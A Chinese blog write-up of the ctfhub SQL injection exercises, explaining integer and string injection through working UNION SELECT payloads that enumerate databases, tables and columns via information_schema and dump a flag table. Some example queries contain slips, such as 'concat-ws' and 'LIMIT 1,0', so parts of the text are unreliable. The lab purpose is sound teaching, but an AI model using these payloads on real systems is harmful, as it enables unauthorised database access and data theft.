- 1搭建IPC通信框架(RPC)_ipcserviceframework
- 2QT5基础教程(介绍,下载,安装,第一个QT程序)
- 3【Tensorflow】训练keras模型+keras的数据生成器ImageDataGenerator+jpg图像数据格式的MNIST数据集+对比flow和flow_from_directory_tensorflow 数据集 数据生成器
- 4C语言-exit(0)、exit(1),return的差别_c语言return1和exit(0)
- 5热压机PLC数据采集远程监控物联网解决方案
- 6Linux qgis 编译,QGIS简介与源代码编译
- 7HarmonyOS应用开发之ArkTS语言学习记录
- 8使用OpenCV 打开摄像头_opencv打开摄像头
- 9OpenCV学习之世界坐标系、相机坐标系、图像坐标系和像素坐标系之间的转换关系_图像和点云标定参数
- 10使用vue+element-ui 切换主题色_vue动态切换element-ui主题
ctfhub技能树web--sql注入_ctfhub技能书sql注入
赞
踩
系列文章目录
ctfhub技能树web–信息泄露
ctfhub技能树web–密码口令
ctfhub技能树web–sql注入
ctfhub技能树web–xss
ctfhub技能树web–文件上传
ctfhub技能树web–RCE
ctfhub技能树web–SSRF
前言
基本概念
- SQL 注入是一种将 SQL 代码插入或添加到应用(用户)的输入参数中,之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。
- 攻击者能够修改 SQL 语句,该进程将与执行命令的组件(如数据库服务器、应用服务器或 WEB 服务器)拥有相同的权限。
- 如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询(该查询在数据库服务器上执行)之前已经对其进行过验证,通常就会出现 SQL 注入漏洞。
提示:以下是本篇文章正文内容,下面案例可供参考
一、整数型注入(已知为数字型)
1.判断注入点
用1 and 1=1和1 and 1=2进行测试(若页面回显不一样,则证明该注入点存在sql injection漏洞)
在数据库中执行的语句:
SELECT * FROM uers WHERE id=1 and 1=1 LIMIT 1,0;
SELECT * FROM uers WHERE id=1 and 1=2 LIMIT 1,0;
2.判断列数
使用order by语句进行测试:1 order by 1、1 order by 2等,直到报错为止,报错的前一个数,为字段数
判断列数的原因:
要使用联合查询注入获取数据库的敏感数据库,前提是两个结果集合的列数相同,所以要判断...?id=1这个语句在数据库中返回几列,也就是SELECT * FROM uers WHERE id=1 and 1=2 LIMIT 1,0这个语句的数据结果集有几列,然后才可以用union进行联合查询
在数据库中执行的语句:
SELECT * FROM uers WHERE id=1 order by 1 LIMIT 1,0;
SELECT * FROM uers WHERE id=1 order by 2 LIMIT 1,0;
以下为构造poc(轮子)过程
注意:要让union前一个语句不成立才能让union后的select语句的结果在前端显示出来
3.判断哪一列是报错点(哪一列会在前端显示的数据)
输入1 and 1=2 union select 1,2 (或者-1 union select 1,2)
4.从当前数据库(默认)获取当前数据库名、用户名等信息
输入1 and 1=2 union select 1,concat-ws('>',database(),version(),user())
扩展:
(1)可以用以下数据库函数获取相应的信息
* user() 当前用户名
* database() 当前数据库明
* version() 当前版本
(2)可以用concat()或concat_ws()或group_concat()—[见数据库连接语句]----使得在sql注入时快速获得数据库的相关信息
5.从元数据库查出当前数据库的所有表名
输入1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
6.从元数据库查出当前数据库下的某个表下的所有列名
输入1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'
7.从当前数据库下的某个表中的查某一列的信息
输入1 and 1=1 union select 1,concat_ws('>',flag) from flag
二、字符型注入(已知为字符型型)
1.判断注入点
用1' and '1'='1和1' and '1'='2进行测试(若页面回显不一样,则证明该注入点存在sql injection漏洞)
在数据库中执行的语句:
SELECT * FROM uers WHERE id=‘1’ and ‘1’=‘1’ LIMIT 1,0;
SELECT * FROM uers WHERE id=‘1’ and ‘1’=‘2’ LIMIT 1,0;
2.判断列数
使用order by语句进行测试:1' order by 1 --+、1' order by 2 --+等,直到报错为止,报错的前一个数,为字段数
闭合后一个单引号的方法:
*注释符# --+ --等
*单引号’
此题在用判断列数时似乎只能用--+来注释掉后一个单引号
判断列数的原因:
要使用联合查询注入获取数据库的敏感数据库,前提是两个结果集合的列数相同,所以要判断...?id=1这个语句在数据库中返回几列,也就是SELECT * FROM uers WHERE id=1 and 1=2 LIMIT 1,0这个语句的数据结果集有几列,然后才可以用union进行联合查询
在数据库中执行的语句:
SELECT * FROM uers WHERE id=‘1’ order by 1 --+’ LIMIT 1,0;
SELECT * FROM uers WHERE id=‘1’ order by 2 --+’ LIMIT 1,0;
//以下为构造poc(轮子)
3.判断哪一列是报错点(哪一列会再前端显示的数据)
输入1' and '1'='2' union select 1,2 --+
4.从当前数据库(默认)获取当前数据库名、用户名等信息
输入1' and '1'='2' union select 1,concat-ws('>',database(),user(),version()) --+
5.从元数据库查出当前数据库的所有表名
输入1' and '1'='2' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+
6.从元数据库查出当前数据库下的某个表下的所有列名
输入1' and '1'='2' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag' --+
7.从当前数据库下的某个表中的查某一列的信息
输入1' and '1'='1' union select 1,concat_ws('>',flag) from flag --+
